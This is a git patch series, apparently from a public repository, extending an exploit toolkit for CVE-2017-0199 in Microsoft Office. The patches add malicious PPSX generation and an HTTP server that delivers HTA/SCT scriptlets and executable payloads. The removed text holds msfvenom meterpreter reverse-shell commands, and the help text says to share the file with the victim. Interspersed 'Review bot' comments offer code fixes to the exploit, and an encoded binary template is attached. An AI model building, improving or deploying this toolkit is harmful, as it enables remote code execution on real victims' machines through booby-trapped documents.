From 62bee2b11c31f9cacaf699929748af1797386d35 Mon Sep 17 00:00:00 2001
From: ll0_0ll
Date: Wed, 2 Aug 2017 13:28:44 +0400
Subject: [PATCH 1/8] Update cve-2017-0199_toolkit.py
---
cve-2017-0199_toolkit.py | 407 +++++++++++++++++++++++++++------------
1 file changed, 288 insertions(+), 119 deletions(-)
diff --git a/cve-2017-0199_toolkit.py b/cve-2017-0199_toolkit.py
index a7a4e74..872a5dc 100644
--- a/cve-2017-0199_toolkit.py
+++ b/cve-2017-0199_toolkit.py
@@ -1,88 +1,15 @@ #!/usr/bin/env python ''' - ## Exploit toolkit CVE-2017-0199 - v3.0 (https://github.com/bhdresh/CVE-2017-0199) ## + ## Exploit toolkit CVE-2017-0199 - v4.0 (https://github.com/bhdresh/CVE-2017-0199) ## - - -Exploit toolkit CVE-2017-0199 - v3.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious (Obfuscated) RTF file and deliver metasploit / meterpreter / other payload to victim without any complex configuration. - -### Scenario 1: Deliver local payload - -Example commands - -1) Generate malicious RTF file - # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1 -2) (Optional, if using MSF Payload) : Generate metasploit payload and start handler - # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe - # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run" -3) Start toolkit in exploit mode to deliver local payload - # python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe - -### Scenario 2: Deliver Remote payload - -Example commands - -1) Generate malicious RTF file - # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1 -2) Start toolkit in exploit mode to deliver remote payload - # python cve-2017-0199_toolkit.py -M exp -e http://remoteserver.com/shell.exe - - -Scenario 3: Deliver custom HTA file - -Example commands - -1) Generate malicious RTF file - # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1 -2) Start toolkit in exploit mode to deliver custom HTA file - # python cve-2017-0199_toolkit.py -M exp -H /tmp/custom.hta - - -### Command line arguments: - - # python cve-2017-0199_toolkit.py -h - - This is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE) - - Modes: - - -M gen Generate Malicious RTF file 
only - - Generate malicious RTF file: - - -w Name of malicious RTF file (Share this file with victim). - - -u The path to an hta file. Normally, this should be a domain or IP where this tool is running. - - For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and - - will be requested once victim will open malicious RTF file. - - -x 0|1 (default = 0) Generate obfuscated RTF file. 0 = Disable, 1 = Enable. - - - - -M exp Start exploitation mode - - Exploitation: - - -H Local path of a custom HTA file which needs to be delivered and executed on target. - NOTE: This option will not deliver payloads specified through options "-e" and "-l". - - -p Local port number. - - -e The path of an executable file / meterpreter shell / payload which needs to be executed on target. - - -l If payload is hosted locally, specify local path of an executable file / meterpreter shell / payload. - - ''' - -import os,sys,thread,socket,sys,getopt,binascii +import os,sys,thread,socket,sys,getopt,binascii,shutil,tempfile from random import randint from random import choice from string import ascii_uppercase +from zipfile import ZipFile, ZIP_STORED, ZipInfo + BACKLOG = 50 # how many pending connections queue will hold MAX_DATA_RECV = 999999 # max number of bytes we receive at once 
@@ -95,38 +22,43 @@ def main(argv): global docuri global payloadurl global payloadlocation - global customhta + global custom global mode global obfuscate + global payloadtype filename = '' docuri = '' payloadurl = '' payloadlocation = '' - customhta = '' + custom = '' port = int("80") host = '' mode = '' obfuscate = int("0") + payloadtype = 'rtf' + # Capture command line arguments try: - opts, args = getopt.getopt(argv,"hM:w:u:p:e:l:H:x:",["mode=","filename=","docuri=","port=","payloadurl=","payloadlocation=","customhta=","obfuscate="]) + opts, args = getopt.getopt(argv,"hM:w:u:p:e:l:H:x:t:",["mode=","filename=","docuri=","port=","payloadurl=","payloadlocation=","custom=","obfuscate=","payloadtype="]) except getopt.GetoptError: print 'Usage: python '+sys.argv[0]+' -h' sys.exit(2) for opt, arg in opts: if opt == '-h': - print "\nThis is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)\n" + print "\nThis is a handy toolkit to exploit CVE-2017-0199 (Microsoft Office RCE)\n" print "Modes:\n" - print " -M gen Generate Malicious RTF file only\n" - print " Generate malicious RTF file:\n" - print " -w Name of malicious RTF file (Share this file with victim).\n" - print " -u The path to an hta file. Normally, this should be a domain or IP where this tool is running.\n" - print " -x 0|1 (default = 0) Generate obfuscated RTF file. 0 = Disable, 1 = Enable.\n" - print " For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and\n" - print " will be requested once victim will open malicious RTF file.\n" + print " -M gen Generate Malicious file only\n" + print " Generate malicious payload:\n" + print " -w Name of malicious RTF/PPSX file (Share this file with victim).\n" + print " -u The path to an HTA/SCT file. 
Normally, this should be a domain or IP where this tool is running.\n" + print " For example, http://attacker.com/test.doc (This URL will be included in malicious file and\n" + print " will be requested once victim will open malicious RTF/PPSX file.\n" + print " -t RTF|PPSX (default = RTF) Type of the file to be generated.\n" + print " -x 0|1 (RTF only) Generate obfuscated RTF file. 0 = Disable, 1 = Enable.\n" print " -M exp Start exploitation mode\n" print " Exploitation:\n" - print " -H Local path of a custom HTA file which needs to be delivered and executed on target.\n" + print " -t RTF|PPSX (default = RTF) Type of file to be exolited.\n" + print " -H Local path of a custom HTA/SCT file which needs to be delivered and executed on target.\n" print " NOTE: This option will not deliver payloads specified through options \"-e\" and \"-l\".\n" print " -p Local port number.\n" print " -e The path of an executable file / meterpreter shell / payload which needs to be executed on target.\n" @@ -144,10 +76,12 @@ def main(argv): payloadurl = arg elif opt in ("-l", "--payloadlocation"): payloadlocation = arg - elif opt in ("-H","--customhta"): - customhta = arg + elif opt in ("-H","--custom"): + custom = arg elif opt in ("-x","--obfuscate"): obfuscate = int(arg) + elif opt in ("-t","--payloadtype"): + payloadtype = arg if "gen" in mode: if (len(filename)<1): print 'Usage: python '+sys.argv[0]+' -h' 
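Review bot: The new `-t` value is stored exactly as typed (`payloadtype = arg`) and is only upper-cased at each later comparison, so its validity is decided in several places further down main rather than once at the point of parsing. Normalising in the option loop, `payloadtype = arg.upper()`, with the default written as `'RTF'` to match the help text, would let a single membership test against `('RTF', 'PPSX')` reject anything else up front. The help line added for exploitation mode also contains a typo: `Type of file to be exolited` should read `exploited`. main begins before and continues after both hunks on this line.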
@@ -155,33 +89,61 @@ def main(argv): if (len(docuri)<1): print 'Usage: python '+sys.argv[0]+' -h' sys.exit() - if obfuscate == 1: - print "Generating obfuscated RTF file.\n" - generate_exploit_obfuscate_rtf() + if (len(payloadtype)<1): + print 'Usage: python '+sys.argv[0]+' -h' + sys.exit() + if payloadtype.upper() == 'RTF': + if obfuscate == 1: + print "Generating obfuscated RTF file.\n" + generate_exploit_obfuscate_rtf() + sys.exit() + if obfuscate == 0: + print "Generating normal RTF payload.\n" + generate_exploit_rtf() + sys.exit() sys.exit() - if obfuscate == 0: - print "Generating normal RTF payload.\n" - generate_exploit_rtf() + if payloadtype.upper() == 'PPSX': + print "Generating normal PPSX payload.\n" + generate_exploit_ppsx() + sys.exit() + if payloadtype.upper() != 'RTF' and payloadtype.upper() != 'PPSX': + print 'Usage: python '+sys.argv[0]+' -h' sys.exit() mode = 'Finished' if "exp" in mode: - if (len(customhta)>1): - print "Running exploit mode (Deliver Custom HTA) - waiting for victim to connect" - exploitation() - sys.exit() - if (len(payloadurl)<1): + if payloadtype.upper() == 'RTF': + if (len(custom)>1): + print "Running exploit mode (Deliver Custom HTA) - waiting for victim to connect" + exploitation_rtf() + sys.exit() + if (len(payloadurl)<1): + print 'Usage: python '+sys.argv[0]+' -h' + sys.exit() + if (len(payloadurl)>1 and len(payloadlocation)<1): + print "Running exploit mode (Deliver HTA with remote payload) - waiting for victim to connect" + exploitation_rtf() + sys.exit() + print "Running exploit mode (Deliver HTA + Local Payload) - waiting for victim to connect" + exploitation_rtf() + mode = 'Finished' + if payloadtype.upper() == 'PPSX': + if (len(custom)>1): + print "Running exploit mode (Deliver Custom SCT) - waiting for victim to connect" + exploitation_ppsx() + sys.exit() + if (len(payloadurl)<1): + print 'Usage: python '+sys.argv[0]+' -h' + sys.exit() + if (len(payloadurl)>1 and len(payloadlocation)<1): + print "Running exploit 
mode (Deliver SCT with remote payload) - waiting for victim to connect" + exploitation_ppsx() + sys.exit() + print "Running exploit mode (Deliver SCT + Local Payload) - waiting for victim to connect" + exploitation_ppsx() + mode = 'Finished' + if not "Finished" in mode: print 'Usage: python '+sys.argv[0]+' -h' sys.exit() - if (len(payloadurl)>1 and len(payloadlocation)<1): - print "Running exploit mode (Deliver HTA with remote payload) - waiting for victim to connect" - exploitation() - sys.exit() - print "Running exploit mode (Deliver HTA + Local Payload) - waiting for victim to connect" - exploitation() - mode = 'Finished' - if not "Finished" in mode: - print 'Usage: python '+sys.argv[0]+' -h' - sys.exit() def generate_exploit_rtf(): # Preparing malicious RTF s = docuri 
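Review bot: The presence tests in the new exploitation branches disagree about what counts as "set": `if (len(custom)>1)` needs at least two characters while `if (len(payloadurl)<1)` only rejects the empty string, so a one-character `custom` is silently treated as absent and a one-character `payloadurl` falls through to the local-payload branch. Plain truth tests, `if custom:` and `if not payloadurl:`, state the intent and close the gap. The RTF and PPSX branches are the same three checks with a different label and handler, so one helper taking the handler and the label (`HTA`/`SCT`) would remove the duplication. Indentation is lost in this rendering, so the nesting of the trailing `if not "Finished" in mode` check should be confirmed against the file; main starts before this hunk.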
@@ -285,8 +247,124 @@ def generate_exploit_obfuscate_rtf(): f.close() print "Generated obfuscated "+filename+" successfully" - -def exploitation(): +def generate_exploit_ppsx(): +# Preparing malicious PPSX + shutil.copy2('template/template.ppsx', filename) + class UpdateableZipFile(ZipFile): + """ + Add delete (via remove_file) and update (via writestr and write methods) + To enable update features use UpdateableZipFile with the 'with statement', + Upon __exit__ (if updates were applied) a new zip file will override the exiting one with the updates + """ + + class DeleteMarker(object): + pass + + def __init__(self, file, mode="r", compression=ZIP_STORED, allowZip64=False): + # Init base + super(UpdateableZipFile, self).__init__(file, mode=mode, + compression=compression, + allowZip64=allowZip64) + # track file to override in zip + self._replace = {} + # Whether the with statement was called + self._allow_updates = False + + def writestr(self, zinfo_or_arcname, bytes, compress_type=None): + if isinstance(zinfo_or_arcname, ZipInfo): + name = zinfo_or_arcname.filename + else: + name = zinfo_or_arcname + # If the file exits, and needs to be overridden, + # mark the entry, and create a temp-file for it + # we allow this only if the with statement is used + if self._allow_updates and name in self.namelist(): + temp_file = self._replace[name] = self._replace.get(name, + tempfile.TemporaryFile()) + temp_file.write(bytes) + # Otherwise just act normally + else: + super(UpdateableZipFile, self).writestr(zinfo_or_arcname, + bytes, compress_type=compress_type) + + def write(self, filename, arcname=None, compress_type=None): + arcname = arcname or filename + # If the file exits, and needs to be overridden, + # mark the entry, and create a temp-file for it + # we allow this only if the with statement is used + if self._allow_updates and arcname in self.namelist(): + temp_file = self._replace[arcname] = self._replace.get(arcname, + tempfile.TemporaryFile()) + with open(filename, 
"rb") as source: + shutil.copyfileobj(source, temp_file) + # Otherwise just act normally + else: + super(UpdateableZipFile, self).write(filename, + arcname=arcname, compress_type=compress_type) + + def __enter__(self): + # Allow updates + self._allow_updates = True + return self + + def __exit__(self, exc_type, exc_val, exc_tb): + # call base to close zip file, organically + try: + super(UpdateableZipFile, self).__exit__(exc_type, exc_val, exc_tb) + if len(self._replace) > 0: + self._rebuild_zip() + finally: + # In case rebuild zip failed, + # be sure to still release all the temp files + self._close_all_temp_files() + self._allow_updates = False + + def _close_all_temp_files(self): + for temp_file in self._replace.itervalues(): + if hasattr(temp_file, 'close'): + temp_file.close() + + def remove_file(self, path): + self._replace[path] = self.DeleteMarker() + + def _rebuild_zip(self): + tempdir = tempfile.mkdtemp() + try: + temp_zip_path = os.path.join(tempdir, 'new.zip') + with ZipFile(self.filename, 'r') as zip_read: + # Create new zip with assigned properties + with ZipFile(temp_zip_path, 'w', compression=self.compression, + allowZip64=self._allowZip64) as zip_write: + for item in zip_read.infolist(): + # Check if the file should be replaced / or deleted + replacement = self._replace.get(item.filename, None) + # If marked for deletion, do not copy file to new zipfile + if isinstance(replacement, self.DeleteMarker): + del self._replace[item.filename] + continue + # If marked for replacement, copy temp_file, instead of old file + elif replacement is not None: + del self._replace[item.filename] + # Write replacement to archive, + # and then close it (deleting the temp file) + replacement.seek(0) + data = replacement.read() + replacement.close() + else: + data = zip_read.read(item.filename) + zip_write.writestr(item, data) + # Override the archive with the updated one + shutil.move(temp_zip_path, self.filename) + finally: + shutil.rmtree(tempdir) + + with 
UpdateableZipFile(filename, "a") as o: + o.writestr("ppt/slides/_rels/slide1.xml.rels", "\ + ") + print "Generated "+filename+" successfully" + + +def exploitation_rtf(): print "Server Running on ",host,":",port @@ -334,16 +412,16 @@ def server_thread(conn, client_addr): conn.close() sys.exit(1) # check if custom HTA flag is set - if (len(customhta)>1): + if (len(custom)>1): print "Received request for custom HTA from "+client_addr[0] try: - size = os.path.getsize(customhta) + size = os.path.getsize(custom) except OSError: - print "Unable to read exe - "+customhta + print "Unable to read exe - "+custom conn.close() sys.exit(1) data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/hta\r\n\r\n" - with open(customhta) as fin: + with open(custom) as fin: data +=fin.read() conn.send(data) conn.close() @@ -356,7 +434,7 @@ def server_thread(conn, client_addr): try: size = os.path.getsize(payloadlocation) except OSError: - print "Unable to read"+payloadlocation + print "Unable to read "+payloadlocation conn.close() sys.exit(1) data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/x-msdos-program\r\n\r\n" 
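Review bot: `UpdateableZipFile` is declared inside `generate_exploit_ppsx`, so about a hundred lines of general zip-rewriting code sit between the template copy and the single `writestr` call that uses them; defining the class at module level would leave the function as copy, open, write, print. Its `writestr` parameter named `bytes` shadows the builtin (`data` would do), and the docstring and comments say "exiting"/"exits" where "existing"/"exists" is meant. `_rebuild_zip` reads each member fully into memory with `zip_read.read(item.filename)`, which deserves a one-line comment stating that this is acceptable only because the archive is the small bundled template.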
@@ -383,5 +461,96 @@ def server_thread(conn, client_addr): sys.exit(1) except socket.error, ex: print ex + + +def exploitation_ppsx(): + + print "Server Running on ",host,":",port + + try: + # create a socket + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + + # associate the socket to host and port + s.bind((host, port)) + + # listenning + s.listen(BACKLOG) + + except socket.error, (value, message): + if s: + s.close() + print "Could not open socket:", message + sys.exit(1) + + # get the connection from client + while 1: + conn, client_addr = s.accept() + + # create a thread to handle request + thread.start_new_thread(server_thread, (conn, client_addr)) + + s.close() + +def server_thread(conn, client_addr): + + # get the request from browser + try: + request = conn.recv(MAX_DATA_RECV) + if (len(request) > 0): + # parse the first line + first_line = request.split('\n')[0] + + # get method + method = first_line.split(' ')[0] + # get url + try: + url = first_line.split(' ')[1] + except IndexError: + print "Invalid request from "+client_addr[0] + conn.close() + sys.exit(1) + # check if custom SCT flag is set + if (len(custom)>1): + print "Received request for custom SCT from "+client_addr[0] + try: + size = os.path.getsize(custom) + except OSError: + print "Unable to read custom SCT file - "+custom + conn.close() + sys.exit(1) + data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/scriptlet\r\n\r\n" + with open(custom) as fin: + data +=fin.read() + conn.send(data) + conn.close() + sys.exit(1) + conn.close() + sys.exit(1) + check_exe_request = url.find('.exe') + if (check_exe_request > 0): + print "Received request for payload from "+client_addr[0] + try: + size = os.path.getsize(payloadlocation) + except OSError: + print "Unable to 
read"+payloadlocation + conn.close() + sys.exit(1) + data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/x-msdos-program\r\n\r\n" + with open(payloadlocation) as fin: + data +=fin.read() + conn.send(data) + conn.close() + sys.exit(1) + if method in ['GET', 'get']: + print "Received GET method from "+client_addr[0] + data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 17:11:03 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 17:30:47 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: 1000\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/scriptlet\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n" + conn.send(data) + conn.close() + sys.exit(1) + except socket.error, ex: + print ex + + if __name__ == '__main__': main(sys.argv[1:]) From a26037caa7692e2ac519da2b213444f8d2cffd84 Mon Sep 17 00:00:00 2001 From: ll0_0ll Date: Wed, 2 Aug 2017 13:29:47 +0400 Subject: [PATCH 2/8] Create 1.txt --- template/1.txt | 1 + 1 file changed, 1 insertion(+) create mode 100644 template/1.txt diff --git a/template/1.txt b/template/1.txt new file mode 100644 index 0000000..d00491f --- /dev/null +++ b/template/1.txt @@ -0,0 +1 @@ +1 From f5707f249e2fbdf0dca6338067030a4443711ade Mon Sep 17 00:00:00 2001 From: ll0_0ll Date: Wed, 2 Aug 2017 14:04:13 +0400 Subject: [PATCH 3/8] Add files via upload --- template/template.ppsx | Bin 0 -> 32790 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 template/template.ppsx 
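Review bot: The canned replies in the new `server_thread` have no comment saying that `Date`, `Last-Modified` and `Server: Apache/2.4.25 (Debian)` are fixed string literals rather than values taken from the host, and that `Content-Length` is computed only when a file is served (the default GET reply hard-codes `1000`). A reader comparing a packet capture with this code has to work that out from the string concatenation. A comment above each literal would document it, for example `# static header block: Date/Last-Modified/Server are literals, not live values`. Because these fields do not vary between runs, they and `Content-Type: text/scriptlet` are the stable values a network signature for traffic produced by this revision can match on.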
diff --git a/template/template.ppsx b/template/template.ppsx new file mode 100644 index 0000000000000000000000000000000000000000..94a432094e8e96190a620a838500db32268fc0e9 GIT binary patch literal 32790 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 
